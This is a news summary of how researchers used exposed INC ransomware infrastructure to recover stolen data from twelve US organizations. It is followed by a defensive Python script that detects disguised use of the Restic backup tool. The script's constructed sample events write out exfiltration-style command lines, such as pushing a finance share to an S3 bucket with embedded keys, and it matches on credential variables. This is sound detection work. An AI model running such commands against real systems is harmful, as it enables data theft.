
INC Ransomware Blunder Exposes Data of 12 US Organizations

Originally published on: January 24, 2026
Summary

– An operational security failure by the INC ransomware gang allowed researchers to recover stolen data from a dozen U.S. organizations by analyzing exposed attacker infrastructure.
– The investigation began after a client detected ransomware and shifted to infrastructure analysis upon finding artifacts from the Restic backup tool, which the attackers used selectively.
– Researchers discovered hardcoded credentials in scripts, theorizing that the gang’s data repositories persisted long after attacks, retaining encrypted victim data.
– Using a controlled process, they confirmed and decrypted data from 12 unrelated U.S. companies, none of which were their clients, and involved law enforcement.
– The team created detection rules to help identify Restic tool misuse and listed INC’s attack tools, noting it is a RaaS operation active since mid-2023.

A significant operational security lapse by the INC ransomware gang has led to the recovery of stolen data from twelve American organizations. This discovery was made possible through a detailed forensic investigation that uncovered attacker-controlled infrastructure, revealing not just the tools used in a single incident but a persistent repository holding information from multiple, unrelated victims. The findings highlight a critical vulnerability in how some cybercriminals manage their stolen assets, potentially offering a path to data recovery long after an attack concludes.

The investigation was conducted by the digital forensics firm Cyber Centaurs, which began its work after a U.S.-based client detected ransomware activity encrypting a production SQL server. The malicious payload was identified as a variant of RainINC ransomware, executed from the Windows PerfLogs directory, a location increasingly exploited by threat actors for staging attacks. During their analysis, researchers encountered artifacts from the legitimate backup utility Restic, even though it wasn’t deployed in this specific breach. This anomaly shifted the focus from mere incident response to a broader infrastructure analysis.

The digital traces left behind included renamed executable files, PowerShell scripts designed to run Restic, and hardcoded configuration details like access keys and repository paths. These remnants suggested the gang was using the backup tool selectively as part of its standard toolkit. Crucially, the researchers hypothesized that if INC routinely reused the same Restic-based storage across different campaigns, then the data repositories might remain active long after individual ransom events were resolved. This meant stolen information could persist in an encrypted state on attacker servers, potentially accessible for recovery.

To test this theory, the team developed a safe, non-destructive process to enumerate the contents of the discovered infrastructure. This confirmed the presence of encrypted data belonging to twelve separate U.S. organizations across sectors including healthcare, manufacturing, technology, and services. None were clients of Cyber Centaurs, and each represented a distinct, unrelated ransomware incident. Following this discovery, the researchers decrypted the backups, preserved the data, and contacted law enforcement to assist with validating ownership and guiding the proper restitution procedures.

The report from Cyber Centaurs details a range of tools associated with INC ransomware operations, such as network scanners, remote access software, and cleanup utilities. To aid defenders, the team also created detection rules (YARA and Sigma) to help identify the Restic tool or its disguised binaries operating in suspicious contexts, which could signal an impending ransomware attack. INC ransomware operates as a Ransomware-as-a-Service (RaaS) platform that emerged in mid-2023 and has claimed numerous high-profile victims globally, including major corporations and government entities. This incident underscores that lapses in criminal operational security can sometimes provide a rare opportunity for defenders to reclaim what was stolen.
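The artifacts described above (a renamed Restic binary, PowerShell wrappers with hardcoded repository keys, execution from PerfLogs) can be turned into a process-creation check. The following is an added example written for this summary, not Cyber Centaurs' YARA/Sigma rules; it assumes a Sysmon-style Event ID 1 record with the image path, PE OriginalFileName and command line, and keys on Restic's real `-r`/`--repo` repository syntax and `RESTIC_*`/`AWS_*` environment variables, which stay the same no matter what the binary is renamed to. The sample events are constructed.

```python
import re
from dataclasses import dataclass

# Markers fixed by the Restic CLI itself, so they survive renaming the binary.
RESTIC_SUBCMDS = {"backup", "init", "snapshots", "restore", "forget", "prune"}
REPO_ARG_RE = re.compile(r"(?:^|\s)(?:-r|--repo)\s+(?:s3|b2|sftp|rest|azure|gs):\S+", re.I)
CRED_ENV = ("RESTIC_REPOSITORY=", "RESTIC_PASSWORD=", "AWS_ACCESS_KEY_ID=", "AWS_SECRET_ACCESS_KEY=")
STAGING_DIR = "\\perflogs\\"  # staging directory named in the article

@dataclass
class ProcEvent:        # hypothetical shape of a Sysmon Event ID 1 record
    image: str          # full path of the executed image
    original_name: str  # PE OriginalFileName, which survives renaming the file
    command_line: str

def restic_indicators(ev: ProcEvent) -> list[str]:
    """Return the Restic-misuse indicators found in one process-creation event."""
    hits, cmd = [], ev.command_line
    if ev.original_name.lower() == "restic.exe" and not ev.image.lower().endswith("\\restic.exe"):
        hits.append("renamed_restic_binary")       # disguised copy of the tool
    if REPO_ARG_RE.search(cmd):
        hits.append("restic_remote_repo_arg")      # -r s3:/b2:/sftp:... target
        if {t.strip("\"'").lower() for t in cmd.split()} & RESTIC_SUBCMDS:
            hits.append("restic_subcommand")
    if any(m in cmd.upper() for m in CRED_ENV):
        hits.append("hardcoded_repo_credentials")  # keys embedded in a script
    if STAGING_DIR in ev.image.lower() or STAGING_DIR in cmd.lower():
        hits.append("perflogs_path")
    return hits

def triage(ev: ProcEvent) -> tuple[str, list[str]]:
    """High: Restic disguised or staged via PerfLogs; medium: plain Restic use to review."""
    hits = restic_indicators(ev)
    restic = {"renamed_restic_binary", "restic_remote_repo_arg", "hardcoded_repo_credentials"}
    if restic & set(hits) and {"renamed_restic_binary", "perflogs_path"} & set(hits):
        return "high", hits
    if restic & set(hits):
        return "medium", hits
    return ("low" if hits else "none"), hits

SAMPLE_EVENTS = [  # constructed samples, not telemetry from the incident
    ProcEvent(r"C:\PerfLogs\winupd.exe", "restic.exe",
              r'winupd.exe -r s3:s3.amazonaws.com/bkt backup "C:\Shares\Finance"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
              r"powershell.exe -c $env:RESTIC_PASSWORD='x'; $env:AWS_ACCESS_KEY_ID='AKIAEXAMPLE'; "
              r"& C:\PerfLogs\winupd.exe -r s3:s3.amazonaws.com/bkt backup C:\Data"),
    ProcEvent(r"C:\Program Files\Restic\restic.exe", "restic.exe",
              "restic.exe -r sftp:backup@nas.corp.example:/repo snapshots"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]
```

Running `triage` over `SAMPLE_EVENTS` rates the renamed PerfLogs binary and the key-embedding PowerShell wrapper high, the properly installed Restic snapshot listing medium for review, and the svchost baseline none; a legitimate backup host can be allow-listed on its image path before alerting on medium hits.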

(Source: Bleeping Computer)
